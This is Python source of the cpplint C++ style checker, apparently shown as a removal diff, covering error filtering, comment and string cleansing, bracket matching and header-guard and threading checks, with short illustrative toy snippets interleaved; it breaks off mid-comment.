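# Toy version (illustrative names, not cpplint's) of the monotonic include
# order enforced by CheckNextIncludeOrder above: the section cursor may only
# move forward, and a header type that would move it backwards is an error.
SECTIONS = ['nothing', 'my header', 'C system header', 'C++ system header',
            'other header']

def advance(cursor, wanted):
    if wanted >= cursor:
        return wanted, ''
    return cursor, 'Found %s after %s' % (SECTIONS[wanted], SECTIONS[cursor])

cursor = 0
for section in (2, 3, 2):      # C, then C++, then C again: out of order
    cursor, message = advance(cursor, section)
    if message:
        print(message)         # Found C system header after C++ system header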
- - Raises: - ValueError: The comma-separated filters did not all start with '+' or '-'. - E.g. "-,+whitespace,-whitespace/indent,whitespace/badfilter" - """ - # Default filters always have less priority than the flag ones. - self.filters = _DEFAULT_FILTERS[:] - for filt in filters.split(','): - clean_filt = filt.strip() - if clean_filt: - self.filters.append(clean_filt) - for filt in self.filters: - if not (filt.startswith('+') or filt.startswith('-')): - raise ValueError('Every filter in --filters must start with + or -' - ' (%s does not)' % filt) - - def ResetErrorCounts(self): - """Sets the module's error statistic back to zero.""" - self.error_count = 0 - self.errors_by_category = {} - - def IncrementErrorCount(self, category): - """Bumps the module's error statistic.""" - self.error_count += 1 - if self.counting in ('toplevel', 'detailed'): - if self.counting != 'detailed': - category = category.split('/')[0] - if category not in self.errors_by_category: - self.errors_by_category[category] = 0 - self.errors_by_category[category] += 1 - - def PrintErrorCounts(self): - """Print a summary of errors by category, and the total.""" - for category, count in self.errors_by_category.iteritems(): - sys.stderr.write('Category \'%s\' errors found: %d\n' % - (category, count)) - sys.stderr.write('Total errors found: %d\n' % self.error_count) - -_cpplint_state = _CppLintState() - - -def _OutputFormat(): - """Gets the module's output format.""" - return _cpplint_state.output_format - - -def _SetOutputFormat(output_format): - """Sets the module's output format.""" - _cpplint_state.SetOutputFormat(output_format) - - -def _VerboseLevel(): - """Returns the module's verbosity setting.""" - return _cpplint_state.verbose_level - - -def _SetVerboseLevel(level): - """Sets the module's verbosity, and returns the previous setting.""" - return _cpplint_state.SetVerboseLevel(level) - - -def _SetCountingStyle(level): - """Sets the module's counting options.""" - _cpplint_state.SetCountingStyle(level) - - -def _Filters(): - """Returns the module's list of output filters, as a list.""" - return _cpplint_state.filters - - -def _SetFilters(filters): - """Sets the module's error-message filters. - - These filters are applied when deciding whether to emit a given - error message. - - Args: - filters: A string of comma-separated filters (eg "whitespace/indent"). - Each filter should start with + or -; else we die. - """ - _cpplint_state.SetFilters(filters) - - -class _FunctionState(object): - """Tracks current function name and the number of lines in its body.""" - - _NORMAL_TRIGGER = 250 # for --v=0, 500 for --v=1, etc. - _TEST_TRIGGER = 400 # about 50% more than _NORMAL_TRIGGER. - - def __init__(self): - self.in_a_function = False - self.lines_in_function = 0 - self.current_function = '' - - def Begin(self, function_name): - """Start analyzing function body. - - Args: - function_name: The name of the function being tracked. - """ - self.in_a_function = True - self.lines_in_function = 0 - self.current_function = function_name - - def Count(self): - """Count line in current function body.""" - if self.in_a_function: - self.lines_in_function += 1 - - def Check(self, error, filename, linenum): - """Report if too many lines in function body. - - Args: - error: The function to call with any errors found. - filename: The name of the current file. - linenum: The number of the line to check. 
- """ - if Match(r'T(EST|est)', self.current_function): - base_trigger = self._TEST_TRIGGER - else: - base_trigger = self._NORMAL_TRIGGER - trigger = base_trigger * 2**_VerboseLevel() - - if self.lines_in_function > trigger: - error_level = int(math.log(self.lines_in_function / base_trigger, 2)) - # 50 => 0, 100 => 1, 200 => 2, 400 => 3, 800 => 4, 1600 => 5, ... - if error_level > 5: - error_level = 5 - error(filename, linenum, 'readability/fn_size', error_level, - 'Small and focused functions are preferred:' - ' %s has %d non-comment lines' - ' (error triggered by exceeding %d lines).' % ( - self.current_function, self.lines_in_function, trigger)) - - def End(self): - """Stop analyzing function body.""" - self.in_a_function = False - - -class _IncludeError(Exception): - """Indicates a problem with the include order in a file.""" - pass - - -class FileInfo: - """Provides utility functions for filenames. - - FileInfo provides easy access to the components of a file's path - relative to the project root. - """ - - def __init__(self, filename): - self._filename = filename - - def FullName(self): - """Make Windows paths like Unix.""" - return os.path.abspath(self._filename).replace('\\', '/') - - def RepositoryName(self): - """FullName after removing the local path to the repository. - - If we have a real absolute path name here we can try to do something smart: - detecting the root of the checkout and truncating /path/to/checkout from - the name so that we get header guards that don't include things like - "C:\Documents and Settings\..." or "/home/username/..." in them and thus - people on different computers who have checked the source out to different - locations won't see bogus errors. - """ - fullname = self.FullName() - - if os.path.exists(fullname): - project_dir = os.path.dirname(fullname) - - if os.path.exists(os.path.join(project_dir, ".svn")): - # If there's a .svn file in the current directory, we recursively look - # up the directory tree for the top of the SVN checkout - root_dir = project_dir - one_up_dir = os.path.dirname(root_dir) - while os.path.exists(os.path.join(one_up_dir, ".svn")): - root_dir = os.path.dirname(root_dir) - one_up_dir = os.path.dirname(one_up_dir) - - prefix = os.path.commonprefix([root_dir, project_dir]) - return fullname[len(prefix) + 1:] - - # Not SVN <= 1.6? Try to find a git, hg, or svn top level directory by - # searching up from the current path. - root_dir = os.path.dirname(fullname) - while (root_dir != os.path.dirname(root_dir) and - not os.path.exists(os.path.join(root_dir, ".git")) and - not os.path.exists(os.path.join(root_dir, ".hg")) and - not os.path.exists(os.path.join(root_dir, ".svn"))): - root_dir = os.path.dirname(root_dir) - - if (os.path.exists(os.path.join(root_dir, ".git")) or - os.path.exists(os.path.join(root_dir, ".hg")) or - os.path.exists(os.path.join(root_dir, ".svn"))): - prefix = os.path.commonprefix([root_dir, project_dir]) - return fullname[len(prefix) + 1:] - - # Don't know what to do; header guard warnings may be wrong... - return fullname - - def Split(self): - """Splits the file into the directory, basename, and extension. - - For 'chrome/browser/browser.cc', Split() would - return ('chrome/browser', 'browser', '.cc') - - Returns: - A tuple of (directory, basename, extension). 
- """ - - googlename = self.RepositoryName() - project, rest = os.path.split(googlename) - return (project,) + os.path.splitext(rest) - - def BaseName(self): - """File base name - text after the final slash, before the final period.""" - return self.Split()[1] - - def Extension(self): - """File extension - text following the final period.""" - return self.Split()[2] - - def NoExtension(self): - """File has no source file extension.""" - return '/'.join(self.Split()[0:2]) - - def IsSource(self): - """File has a source file extension.""" - return self.Extension()[1:] in ('c', 'cc', 'cpp', 'cxx') - - -def _ShouldPrintError(category, confidence, linenum): - """If confidence >= verbose, category passes filter and is not suppressed.""" - - # There are three ways we might decide not to print an error message: - # a "NOLINT(category)" comment appears in the source, - # the verbosity level isn't high enough, or the filters filter it out. - if IsErrorSuppressedByNolint(category, linenum): - return False - if confidence < _cpplint_state.verbose_level: - return False - - is_filtered = False - for one_filter in _Filters(): - if one_filter.startswith('-'): - if category.startswith(one_filter[1:]): - is_filtered = True - elif one_filter.startswith('+'): - if category.startswith(one_filter[1:]): - is_filtered = False - else: - assert False # should have been checked for in SetFilter. - if is_filtered: - return False - - return True - - -def Error(filename, linenum, category, confidence, message): - """Logs the fact we've found a lint error. - - We log where the error was found, and also our confidence in the error, - that is, how certain we are this is a legitimate style regression, and - not a misidentification or a use that's sometimes justified. - - False positives can be suppressed by the use of - "cpplint(category)" comments on the offending line. These are - parsed into _error_suppressions. - - Args: - filename: The name of the file containing the error. - linenum: The number of the line containing the error. - category: A string used to describe the "category" this bug - falls under: "whitespace", say, or "runtime". Categories - may have a hierarchy separated by slashes: "whitespace/indent". - confidence: A number from 1-5 representing a confidence score for - the error, with 5 meaning that we are certain of the problem, - and 1 meaning that it could be a legitimate construct. - message: The error message. - """ - if _ShouldPrintError(category, confidence, linenum): - _cpplint_state.IncrementErrorCount(category) - if _cpplint_state.output_format == 'vs7': - sys.stderr.write('%s(%s): %s [%s] [%d]\n' % ( - filename, linenum, message, category, confidence)) - elif _cpplint_state.output_format == 'eclipse': - sys.stderr.write('%s:%s: warning: %s [%s] [%d]\n' % ( - filename, linenum, message, category, confidence)) - else: - sys.stderr.write('%s:%s: %s [%s] [%d]\n' % ( - filename, linenum, message, category, confidence)) - - -# Matches standard C++ escape sequences per 2.13.2.3 of the C++ standard. -_RE_PATTERN_CLEANSE_LINE_ESCAPES = re.compile( - r'\\([abfnrtv?"\\\']|\d+|x[0-9a-fA-F]+)') -# Matches strings. Escape codes should already be removed by ESCAPES. -_RE_PATTERN_CLEANSE_LINE_DOUBLE_QUOTES = re.compile(r'"[^"]*"') -# Matches characters. Escape codes should already be removed by ESCAPES. -_RE_PATTERN_CLEANSE_LINE_SINGLE_QUOTES = re.compile(r"'.'") -# Matches multi-line C++ comments. 
-# This RE is a little bit more complicated than one might expect, because we -# have to take care of space removals tools so we can handle comments inside -# statements better. -# The current rule is: We only clear spaces from both sides when we're at the -# end of the line. Otherwise, we try to remove spaces from the right side, -# if this doesn't work we try on left side but only if there's a non-character -# on the right. -_RE_PATTERN_CLEANSE_LINE_C_COMMENTS = re.compile( - r"""(\s*/\*.*\*/\s*$| - /\*.*\*/\s+| - \s+/\*.*\*/(?=\W)| - /\*.*\*/)""", re.VERBOSE) - - -def IsCppString(line): - """Does line terminate so, that the next symbol is in string constant. - - This function does not consider single-line nor multi-line comments. - - Args: - line: is a partial line of code starting from the 0..n. - - Returns: - True, if next character appended to 'line' is inside a - string constant. - """ - - line = line.replace(r'\\', 'XX') # after this, \\" does not match to \" - return ((line.count('"') - line.count(r'\"') - line.count("'\"'")) & 1) == 1 - - -def CleanseRawStrings(raw_lines): - """Removes C++11 raw strings from lines. - - Before: - static const char kData[] = R"( - multi-line string - )"; - - After: - static const char kData[] = "" - (replaced by blank line) - ""; - - Args: - raw_lines: list of raw lines. - - Returns: - list of lines with C++11 raw strings replaced by empty strings. - """ - - delimiter = None - lines_without_raw_strings = [] - for line in raw_lines: - if delimiter: - # Inside a raw string, look for the end - end = line.find(delimiter) - if end >= 0: - # Found the end of the string, match leading space for this - # line and resume copying the original lines, and also insert - # a "" on the last line. - leading_space = Match(r'^(\s*)\S', line) - line = leading_space.group(1) + '""' + line[end + len(delimiter):] - delimiter = None - else: - # Haven't found the end yet, append a blank line. - line = '' - - else: - # Look for beginning of a raw string. - # See 2.14.15 [lex.string] for syntax. - matched = Match(r'^(.*)\b(?:R|u8R|uR|UR|LR)"([^\s\\()]*)\((.*)$', line) - if matched: - delimiter = ')' + matched.group(2) + '"' - - end = matched.group(3).find(delimiter) - if end >= 0: - # Raw string ended on same line - line = (matched.group(1) + '""' + - matched.group(3)[end + len(delimiter):]) - delimiter = None - else: - # Start of a multi-line raw string - line = matched.group(1) + '""' - - lines_without_raw_strings.append(line) - - # TODO(unknown): if delimiter is not None here, we might want to - # emit a warning for unterminated string. - return lines_without_raw_strings - - -def FindNextMultiLineCommentStart(lines, lineix): - """Find the beginning marker for a multiline comment.""" - while lineix < len(lines): - if lines[lineix].strip().startswith('/*'): - # Only return this marker if the comment goes beyond this line - if lines[lineix].strip().find('*/', 2) < 0: - return lineix - lineix += 1 - return len(lines) - - -def FindNextMultiLineCommentEnd(lines, lineix): - """We are inside a comment, find the end marker.""" - while lineix < len(lines): - if lines[lineix].strip().endswith('*/'): - return lineix - lineix += 1 - return len(lines) - - -def RemoveMultiLineCommentsFromRange(lines, begin, end): - """Clears a range of lines for multi-line comments.""" - # Having // dummy comments makes the lines non-empty, so we will not get - # unnecessary blank line warnings later in the code. 
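# The quote-parity trick of IsCppString above, standalone: after neutralizing
# escaped backslashes, a line leaves the parser inside a string constant iff
# it contains an odd number of unescaped double quotes.
def inside_string(line):
    line = line.replace('\\\\', 'XX')    # so \\" no longer looks like \"
    return ((line.count('"') - line.count('\\"') - line.count("'\"'")) & 1) == 1

print(inside_string('printf("hello'))     # True: the string is still open
print(inside_string('printf("hello");'))  # False: quotes are balanced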
- for i in range(begin, end): - lines[i] = '// dummy' - - -def RemoveMultiLineComments(filename, lines, error): - """Removes multiline (c-style) comments from lines.""" - lineix = 0 - while lineix < len(lines): - lineix_begin = FindNextMultiLineCommentStart(lines, lineix) - if lineix_begin >= len(lines): - return - lineix_end = FindNextMultiLineCommentEnd(lines, lineix_begin) - if lineix_end >= len(lines): - error(filename, lineix_begin + 1, 'readability/multiline_comment', 5, - 'Could not find end of multi-line comment') - return - RemoveMultiLineCommentsFromRange(lines, lineix_begin, lineix_end + 1) - lineix = lineix_end + 1 - - -def CleanseComments(line): - """Removes //-comments and single-line C-style /* */ comments. - - Args: - line: A line of C++ source. - - Returns: - The line with single-line comments removed. - """ - commentpos = line.find('//') - if commentpos != -1 and not IsCppString(line[:commentpos]): - line = line[:commentpos].rstrip() - # get rid of /* ... */ - return _RE_PATTERN_CLEANSE_LINE_C_COMMENTS.sub('', line) - - -class CleansedLines(object): - """Holds 3 copies of all lines with different preprocessing applied to them. - - 1) elided member contains lines without strings and comments, - 2) lines member contains lines without comments, and - 3) raw_lines member contains all the lines without processing. - All these three members are of <type 'list'>, and of the same length. - """ - - def __init__(self, lines): - self.elided = [] - self.lines = [] - self.raw_lines = lines - self.num_lines = len(lines) - self.lines_without_raw_strings = CleanseRawStrings(lines) - for linenum in range(len(self.lines_without_raw_strings)): - self.lines.append(CleanseComments( - self.lines_without_raw_strings[linenum])) - elided = self._CollapseStrings(self.lines_without_raw_strings[linenum]) - self.elided.append(CleanseComments(elided)) - - def NumLines(self): - """Returns the number of lines represented.""" - return self.num_lines - - @staticmethod - def _CollapseStrings(elided): - """Collapses strings and chars on a line to simple "" or '' blocks. - - We nix strings first so we're not fooled by text like '"http://"' - - Args: - elided: The line being processed. - - Returns: - The line with collapsed strings. - """ - if not _RE_PATTERN_INCLUDE.match(elided): - # Remove escaped characters first to make quote/single quote collapsing - # basic. Things that look like escaped characters shouldn't occur - # outside of strings and chars. - elided = _RE_PATTERN_CLEANSE_LINE_ESCAPES.sub('', elided) - elided = _RE_PATTERN_CLEANSE_LINE_SINGLE_QUOTES.sub("''", elided) - elided = _RE_PATTERN_CLEANSE_LINE_DOUBLE_QUOTES.sub('""', elided) - return elided - - -def FindEndOfExpressionInLine(line, startpos, depth, startchar, endchar): - """Find the position just after the matching endchar. - - Args: - line: a CleansedLines line. - startpos: start searching at this position. - depth: nesting level at startpos. - startchar: expression opening character. - endchar: expression closing character. - - Returns: - On finding matching endchar: (index just after matching endchar, 0) - Otherwise: (-1, new depth at end of this line) - """ - for i in xrange(startpos, len(line)): - if line[i] == startchar: - depth += 1 - elif line[i] == endchar: - depth -= 1 - if depth == 0: - return (i + 1, 0) - return (-1, depth) - - -def CloseExpression(clean_lines, linenum, pos): - """If input points to ( or { or [ or <, finds the position that closes it.
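# FindEndOfExpressionInLine above, exercised on one line: walk the characters,
# track the nesting depth, and report the index just past the character that
# brings the depth back to zero.
def find_end(line, startpos, depth, startchar, endchar):
    for i in range(startpos, len(line)):
        if line[i] == startchar:
            depth += 1
        elif line[i] == endchar:
            depth -= 1
            if depth == 0:
                return (i + 1, 0)
    return (-1, depth)

print(find_end('f(a, g(b), c) + d', 1, 0, '(', ')'))  # (13, 0): found it
print(find_end('f(a, g(b),', 1, 0, '(', ')'))         # (-1, 1): spills over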
- - If lines[linenum][pos] points to a '(' or '{' or '[' or '<', finds the - linenum/pos that correspond to the closing of the expression. - - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - pos: A position on the line. - - Returns: - A tuple (line, linenum, pos) pointer *past* the closing brace, or - (line, len(lines), -1) if we never find a close. Note we ignore - strings and comments when matching; and the line we return is the - 'cleansed' line at linenum. - """ - - line = clean_lines.elided[linenum] - startchar = line[pos] - if startchar not in '({[<': - return (line, clean_lines.NumLines(), -1) - if startchar == '(': endchar = ')' - if startchar == '[': endchar = ']' - if startchar == '{': endchar = '}' - if startchar == '<': endchar = '>' - - # Check first line - (end_pos, num_open) = FindEndOfExpressionInLine( - line, pos, 0, startchar, endchar) - if end_pos > -1: - return (line, linenum, end_pos) - - # Continue scanning forward - while linenum < clean_lines.NumLines() - 1: - linenum += 1 - line = clean_lines.elided[linenum] - (end_pos, num_open) = FindEndOfExpressionInLine( - line, 0, num_open, startchar, endchar) - if end_pos > -1: - return (line, linenum, end_pos) - - # Did not find endchar before end of file, give up - return (line, clean_lines.NumLines(), -1) - - -def FindStartOfExpressionInLine(line, endpos, depth, startchar, endchar): - """Find position at the matching startchar. - - This is almost the reverse of FindEndOfExpressionInLine, but note - that the input position and returned position differs by 1. - - Args: - line: a CleansedLines line. - endpos: start searching at this position. - depth: nesting level at endpos. - startchar: expression opening character. - endchar: expression closing character. - - Returns: - On finding matching startchar: (index at matching startchar, 0) - Otherwise: (-1, new depth at beginning of this line) - """ - for i in xrange(endpos, -1, -1): - if line[i] == endchar: - depth += 1 - elif line[i] == startchar: - depth -= 1 - if depth == 0: - return (i, 0) - return (-1, depth) - - -def ReverseCloseExpression(clean_lines, linenum, pos): - """If input points to ) or } or ] or >, finds the position that opens it. - - If lines[linenum][pos] points to a ')' or '}' or ']' or '>', finds the - linenum/pos that correspond to the opening of the expression. - - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - pos: A position on the line. - - Returns: - A tuple (line, linenum, pos) pointer *at* the opening brace, or - (line, 0, -1) if we never find the matching opening brace. Note - we ignore strings and comments when matching; and the line we - return is the 'cleansed' line at linenum. 
- """ - line = clean_lines.elided[linenum] - endchar = line[pos] - if endchar not in ')}]>': - return (line, 0, -1) - if endchar == ')': startchar = '(' - if endchar == ']': startchar = '[' - if endchar == '}': startchar = '{' - if endchar == '>': startchar = '<' - - # Check last line - (start_pos, num_open) = FindStartOfExpressionInLine( - line, pos, 0, startchar, endchar) - if start_pos > -1: - return (line, linenum, start_pos) - - # Continue scanning backward - while linenum > 0: - linenum -= 1 - line = clean_lines.elided[linenum] - (start_pos, num_open) = FindStartOfExpressionInLine( - line, len(line) - 1, num_open, startchar, endchar) - if start_pos > -1: - return (line, linenum, start_pos) - - # Did not find startchar before beginning of file, give up - return (line, 0, -1) - - -def CheckForCopyright(filename, lines, error): - """Logs an error if no Copyright message appears at the top of the file.""" - - # We'll say it should occur by line 10. Don't forget there's a - # dummy line at the front. - for line in xrange(1, min(len(lines), 11)): - if re.search(r'Copyright', lines[line], re.I): break - else: # means no copyright line was found - error(filename, 0, 'legal/copyright', 5, - 'No copyright message found. ' - 'You should have a line: "Copyright [year] "') - - -def GetHeaderGuardCPPVariable(filename): - """Returns the CPP variable that should be used as a header guard. - - Args: - filename: The name of a C++ header file. - - Returns: - The CPP variable that should be used as a header guard in the - named file. - - """ - - # Restores original filename in case that cpplint is invoked from Emacs's - # flymake. - filename = re.sub(r'_flymake\.h$', '.h', filename) - filename = re.sub(r'/\.flymake/([^/]*)$', r'/\1', filename) - - fileinfo = FileInfo(filename) - file_path_from_root = fileinfo.RepositoryName() - if _root: - file_path_from_root = re.sub('^' + _root + os.sep, '', file_path_from_root) - return re.sub(r'[-./\s]', '_', file_path_from_root).upper() + '_' - - -def CheckForHeaderGuard(filename, lines, error): - """Checks that the file contains a header guard. - - Logs an error if no #ifndef header guard is present. For other - headers, checks that the full pathname is used. - - Args: - filename: The name of the C++ header file. - lines: An array of strings, each representing a line of the file. - error: The function to call with any errors found. - """ - - cppvar = GetHeaderGuardCPPVariable(filename) - - ifndef = None - ifndef_linenum = 0 - define = None - endif = None - endif_linenum = 0 - for linenum, line in enumerate(lines): - # Already been well guarded, no need for further checking. - if line.strip() == "#pragma once": - return - linesplit = line.split() - if len(linesplit) >= 2: - # find the first occurrence of #ifndef and #define, save arg - if not ifndef and linesplit[0] == '#ifndef': - # set ifndef to the header guard presented on the #ifndef line. 
- ifndef = linesplit[1] - ifndef_linenum = linenum - if not define and linesplit[0] == '#define': - define = linesplit[1] - # find the last occurrence of #endif, save entire line - if line.startswith('#endif'): - endif = line - endif_linenum = linenum - - if not ifndef: - error(filename, 0, 'build/header_guard', 5, - 'No #ifndef header guard found, suggested CPP variable is: %s' % - cppvar) - return - - if not define: - error(filename, 0, 'build/header_guard', 5, - 'No #define header guard found, suggested CPP variable is: %s' % - cppvar) - return - - # The guard should be PATH_FILE_H_, but we also allow PATH_FILE_H__ - # for backward compatibility. - if ifndef != cppvar: - error_level = 0 - if ifndef != cppvar + '_': - error_level = 5 - - ParseNolintSuppressions(filename, lines[ifndef_linenum], ifndef_linenum, - error) - error(filename, ifndef_linenum, 'build/header_guard', error_level, - '#ifndef header guard has wrong style, please use: %s' % cppvar) - - if define != ifndef: - error(filename, 0, 'build/header_guard', 5, - '#ifndef and #define don\'t match, suggested CPP variable is: %s' % - cppvar) - return - - if endif != ('#endif // %s' % cppvar): - error_level = 0 - if endif != ('#endif // %s' % (cppvar + '_')): - error_level = 5 - - ParseNolintSuppressions(filename, lines[endif_linenum], endif_linenum, - error) - error(filename, endif_linenum, 'build/header_guard', error_level, - '#endif line should be "#endif // %s"' % cppvar) - - -def CheckForBadCharacters(filename, lines, error): - """Logs an error for each line containing bad characters. - - Two kinds of bad characters: - - 1. Unicode replacement characters: These indicate that either the file - contained invalid UTF-8 (likely) or Unicode replacement characters (which - it shouldn't). Note that it's possible for this to throw off line - numbering if the invalid UTF-8 occurred adjacent to a newline. - - 2. NUL bytes. These are problematic for some tools. - - Args: - filename: The name of the current file. - lines: An array of strings, each representing a line of the file. - error: The function to call with any errors found. - """ - for linenum, line in enumerate(lines): - if u'\ufffd' in line: - error(filename, linenum, 'readability/utf8', 5, - 'Line contains invalid UTF-8 (or Unicode replacement character).') - if '\0' in line: - error(filename, linenum, 'readability/nul', 5, 'Line contains NUL byte.') - - -def CheckForNewlineAtEOF(filename, lines, error): - """Logs an error if there is no newline char at the end of the file. - - Args: - filename: The name of the current file. - lines: An array of strings, each representing a line of the file. - error: The function to call with any errors found. - """ - - # The array lines() was created by adding two newlines to the - # original file (go figure), then splitting on \n. - # To verify that the file ends in \n, we just have to make sure the - # last-but-two element of lines() exists and is empty. - if len(lines) < 3 or lines[-2]: - error(filename, len(lines) - 2, 'whitespace/ending_newline', 5, - 'Could not find a newline character at the end of the file.') - - -def CheckForMultilineCommentsAndStrings(filename, clean_lines, linenum, error): - """Logs an error if we see /* ... */ or "..." that extend past one line. - - /* ... */ comments are legit inside macros, for one line. - Otherwise, we prefer // comments, so it's ok to warn about the - other. 
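# The two byte-level checks of CheckForBadCharacters above, standalone: a
# U+FFFD replacement character usually means the file was not valid UTF-8,
# and NUL bytes confuse other tooling.
def bad_characters(lines):
    for linenum, line in enumerate(lines):
        if u'\ufffd' in line:
            yield (linenum, 'invalid UTF-8 (or replacement character)')
        if '\0' in line:
            yield (linenum, 'NUL byte')

print(list(bad_characters([u'ok line', u'broken \ufffd here'])))
# [(1, 'invalid UTF-8 (or replacement character)')]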
Likewise, it's ok for strings to extend across multiple - lines, as long as a line continuation character (backslash) - terminates each line. Although not currently prohibited by the C++ - style guide, it's ugly and unnecessary. We don't do well with either - in this lint program, so we warn about both. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - - # Remove all \\ (escaped backslashes) from the line. They are OK, and the - # second (escaped) slash may trigger later \" detection erroneously. - line = line.replace('\\\\', '') - - if line.count('/*') > line.count('*/'): - error(filename, linenum, 'readability/multiline_comment', 5, - 'Complex multi-line /*...*/-style comment found. ' - 'Lint may give bogus warnings. ' - 'Consider replacing these with //-style comments, ' - 'with #if 0...#endif, ' - 'or with more clearly structured multi-line comments.') - - if (line.count('"') - line.count('\\"')) % 2: - error(filename, linenum, 'readability/multiline_string', 5, - 'Multi-line string ("...") found. This lint script doesn\'t ' - 'do well with such strings, and may give bogus warnings. ' - 'Use C++11 raw strings or concatenation instead.') - - -threading_list = ( - ('asctime(', 'asctime_r('), - ('ctime(', 'ctime_r('), - ('getgrgid(', 'getgrgid_r('), - ('getgrnam(', 'getgrnam_r('), - ('getlogin(', 'getlogin_r('), - ('getpwnam(', 'getpwnam_r('), - ('getpwuid(', 'getpwuid_r('), - ('gmtime(', 'gmtime_r('), - ('localtime(', 'localtime_r('), - ('rand(', 'rand_r('), - ('strtok(', 'strtok_r('), - ('ttyname(', 'ttyname_r('), - ) - - -def CheckPosixThreading(filename, clean_lines, linenum, error): - """Checks for calls to thread-unsafe functions. - - Much code has been originally written without consideration of - multi-threading. Also, engineers are relying on their old experience; - they have learned posix before threading extensions were added. These - tests guide the engineers to use thread-safe functions (when using - posix directly). - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - for single_thread_function, multithread_safe_function in threading_list: - ix = line.find(single_thread_function) - # Comparisons made explicit for clarity -- pylint: disable=g-explicit-bool-comparison - if ix >= 0 and (ix == 0 or (not line[ix - 1].isalnum() and - line[ix - 1] not in ('_', '.', '>'))): - error(filename, linenum, 'runtime/threadsafe_fn', 2, - 'Consider using ' + multithread_safe_function + - '...) instead of ' + single_thread_function + - '...) for improved thread safety.') - - -def CheckVlogArguments(filename, clean_lines, linenum, error): - """Checks that VLOG() is only used for defining a logging level. - - For example, VLOG(2) is correct. VLOG(INFO), VLOG(WARNING), VLOG(ERROR), and - VLOG(FATAL) are not. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. 
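# The word-boundary test of CheckPosixThreading above, standalone: flag a
# call such as rand( only when the preceding character could not extend an
# identifier or a member access, so strand( and foo.rand( are left alone.
def flags_unsafe_call(line, fn='rand('):
    ix = line.find(fn)
    return ix >= 0 and (ix == 0 or (not line[ix - 1].isalnum() and
                                    line[ix - 1] not in ('_', '.', '>')))

print(flags_unsafe_call('int r = rand();'))  # True: suggest rand_r(...)
print(flags_unsafe_call('s = strand(x);'))   # False: part of another name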
- """ - line = clean_lines.elided[linenum] - if Search(r'\bVLOG\((INFO|ERROR|WARNING|DFATAL|FATAL)\)', line): - error(filename, linenum, 'runtime/vlog', 5, - 'VLOG() should be used with numeric verbosity level. ' - 'Use LOG() if you want symbolic severity levels.') - - -# Matches invalid increment: *count++, which moves pointer instead of -# incrementing a value. -_RE_PATTERN_INVALID_INCREMENT = re.compile( - r'^\s*\*\w+(\+\+|--);') - - -def CheckInvalidIncrement(filename, clean_lines, linenum, error): - """Checks for invalid increment *count++. - - For example following function: - void increment_counter(int* count) { - *count++; - } - is invalid, because it effectively does count++, moving pointer, and should - be replaced with ++*count, (*count)++ or *count += 1. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - if _RE_PATTERN_INVALID_INCREMENT.match(line): - error(filename, linenum, 'runtime/invalid_increment', 5, - 'Changing pointer instead of value (or unused value of operator*).') - - -class _BlockInfo(object): - """Stores information about a generic block of code.""" - - def __init__(self, seen_open_brace): - self.seen_open_brace = seen_open_brace - self.open_parentheses = 0 - self.inline_asm = _NO_ASM - - def CheckBegin(self, filename, clean_lines, linenum, error): - """Run checks that applies to text up to the opening brace. - - This is mostly for checking the text after the class identifier - and the "{", usually where the base class is specified. For other - blocks, there isn't much to check, so we always pass. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - pass - - def CheckEnd(self, filename, clean_lines, linenum, error): - """Run checks that applies to text after the closing brace. - - This is mostly used for checking end of namespace comments. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - pass - - -class _ClassInfo(_BlockInfo): - """Stores information about a class.""" - - def __init__(self, name, class_or_struct, clean_lines, linenum): - _BlockInfo.__init__(self, False) - self.name = name - self.starting_linenum = linenum - self.is_derived = False - if class_or_struct == 'struct': - self.access = 'public' - self.is_struct = True - else: - self.access = 'private' - self.is_struct = False - - # Remember initial indentation level for this class. Using raw_lines here - # instead of elided to account for leading comments. - initial_indent = Match(r'^( *)\S', clean_lines.raw_lines[linenum]) - if initial_indent: - self.class_indent = len(initial_indent.group(1)) - else: - self.class_indent = 0 - - # Try to find the end of the class. This will be confused by things like: - # class A { - # } *x = { ... - # - # But it's still good enough for CheckSectionSpacing. 
- self.last_line = 0 - depth = 0 - for i in range(linenum, clean_lines.NumLines()): - line = clean_lines.elided[i] - depth += line.count('{') - line.count('}') - if not depth: - self.last_line = i - break - - def CheckBegin(self, filename, clean_lines, linenum, error): - # Look for a bare ':' - if Search('(^|[^:]):($|[^:])', clean_lines.elided[linenum]): - self.is_derived = True - - def CheckEnd(self, filename, clean_lines, linenum, error): - # Check that closing brace is aligned with beginning of the class. - # Only do this if the closing brace is indented by only whitespaces. - # This means we will not check single-line class definitions. - indent = Match(r'^( *)\}', clean_lines.elided[linenum]) - if indent and len(indent.group(1)) != self.class_indent: - if self.is_struct: - parent = 'struct ' + self.name - else: - parent = 'class ' + self.name - error(filename, linenum, 'whitespace/indent', 3, - 'Closing brace should be aligned with beginning of %s' % parent) - - -class _NamespaceInfo(_BlockInfo): - """Stores information about a namespace.""" - - def __init__(self, name, linenum): - _BlockInfo.__init__(self, False) - self.name = name or '' - self.starting_linenum = linenum - - def CheckEnd(self, filename, clean_lines, linenum, error): - """Check end of namespace comments.""" - line = clean_lines.raw_lines[linenum] - - # Check how many lines is enclosed in this namespace. Don't issue - # warning for missing namespace comments if there aren't enough - # lines. However, do apply checks if there is already an end of - # namespace comment and it's incorrect. - # - # TODO(unknown): We always want to check end of namespace comments - # if a namespace is large, but sometimes we also want to apply the - # check if a short namespace contained nontrivial things (something - # other than forward declarations). There is currently no logic on - # deciding what these nontrivial things are, so this check is - # triggered by namespace size only, which works most of the time. - if (linenum - self.starting_linenum < 10 - and not Match(r'};*\s*(//|/\*).*\bnamespace\b', line)): - return - - # Look for matching comment at end of namespace. - # - # Note that we accept C style "/* */" comments for terminating - # namespaces, so that code that terminate namespaces inside - # 